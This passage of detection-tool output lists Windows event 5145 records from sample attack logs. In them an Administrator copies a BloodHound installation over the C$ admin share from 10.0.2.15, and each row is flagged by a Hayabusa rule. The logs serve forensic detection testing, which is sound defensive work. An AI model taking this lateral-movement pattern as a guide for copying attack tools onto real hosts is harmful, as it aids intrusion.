Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: 
\??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File 
Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File 
Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 